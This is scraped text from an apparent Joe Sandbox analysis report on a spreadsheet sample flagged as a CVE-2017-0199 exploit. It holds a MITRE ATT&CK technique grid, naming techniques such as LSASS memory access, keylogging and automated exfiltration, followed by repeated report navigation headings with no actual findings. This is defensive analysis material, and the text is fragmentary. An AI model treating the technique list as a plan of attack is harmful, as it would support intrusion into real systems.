Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx